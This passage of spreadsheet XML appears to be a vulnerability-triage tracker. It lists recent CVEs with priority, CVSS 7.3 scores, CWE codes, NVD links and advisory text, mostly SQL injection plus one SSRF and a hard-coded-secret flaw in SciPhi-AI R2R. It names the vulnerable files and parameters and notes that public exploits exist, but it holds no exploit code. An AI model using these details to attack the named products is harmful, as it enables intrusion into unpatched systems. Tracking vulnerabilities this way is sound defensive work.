          <t>A vulnerability was determined in SciPhi-AI R2R up to 3.6.6. This affects an unknown part of the component JWT Secret Handler. This manipulation of the argument DEFAULT_BCRYPT_SECRET_KEY/DEFAULT_NACL_SECRET_KEY causes hard-coded credentials. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105147</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105148</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SciPhi-AI R2R up to 3.6.6. This vulnerability affects unknown code of the file py/shared/abstractions/llm.py of the component Retrieval Completion API Endpoint. Such manipulation of the argument generation_config.api_base leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105148</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105149</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in mooSocial up to 3.2.4. This issue affects some unknown processing of the file /stores/all-products. Performing a manipulation of the argument rating results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105149</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105158</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in RainyGao DocSys up to 2.02.85. The impacted element is the function BaseController.createDBForMysql of the file BaseController.java of the component Database Management. The manipulation of the argument url results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105158</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105166</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The affected element is the function insert of the file fooddonateform.php of the component Food Donation Form. Performing a manipulation of the argument image-choice results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105166</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105167</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The impacted element is an unknown function of the file admin/donate.php. Executing a manipulation of the argument location can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105167</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105169</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This impacts an unknown function of the file delivery/delivery.php of the component Take Order Handler. The manipulation of the argument order_id/delivery_person_id results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105169</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105170</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Affected is an unknown function of the file admin/signup.php of the component Admin Signup. This manipulation of the argument sign causes missing authentication. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105170</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105172</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Online Admission System 1.0. Affected by this issue is some unknown functionality of the file /login1.php. Performing a manipulation of the argument User results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105172</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105175</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Drug Recommendation System 1.0. This issue affects some unknown processing of the file /Auth/add_student.php of the component Student Registration. The manipulation of the argument cmdschool results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105175</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105182</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/activities/btn_functions.php?action=update. The manipulation of the argument Title results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105182</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105183</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in itsourcecode Online Admission System 1.0. The affected element is an unknown function of the file /admin/confirm.php. This manipulation of the argument schedid causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105183</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105184</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in itsourcecode Online Admission System 1.0. The impacted element is an unknown function of the file /admin/creteria.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105184</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105185</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Online Admission System 1.0. This affects an unknown function of the file /admin/examinee.php. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105185</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105229</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This issue affects some unknown processing of the file signup.php of the component User Registration Endpoint. Executing a manipulation of the argument email/name/gender can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105229</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105230</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Impacted is an unknown function of the file delivery/deliverymyord.php. The manipulation of the argument delivery_person_id/order_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105230</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105231</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
